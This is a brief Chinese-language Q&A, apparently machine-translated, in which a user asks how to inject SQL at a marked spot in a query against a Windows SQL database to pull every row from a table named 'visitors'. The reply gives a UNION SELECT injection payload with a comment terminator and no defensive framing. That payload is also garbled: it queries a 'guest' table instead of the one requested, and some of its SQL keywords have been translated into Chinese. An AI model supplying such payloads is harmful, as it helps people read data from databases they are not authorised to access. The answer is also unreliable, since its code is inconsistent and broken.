我正在 Windows SQL 上创建 SQL 注入,以从名为“visitors”的备用表中检索数据。考虑到此任务作为注入的性质,我只能在指定标记“########”内插入代码。
如何从已知表中获取所有数据并在该部分插入代码?
SELECT
condo.idCondo,
condo.name
FROM
condo
INNER JOIN house ON condo.idCondo = house.idCondo
WHERE
house.status = 1
AND house.idStatushouse in (1, 333)
AND condo.status = 1
AND (house.idtranfer = 0)
AND idResidencial = 1
or idResidencial like ############################
GROUP BY
condo.idCondo,
condo.name
ORDER BY
name ASC
要使用 SQL 注入从名为“visitors”的备用表检索数据,您可以使用以下方法。
或 idResidencial 类似 '1' UNION SELECT 1, '1' FROM guest--'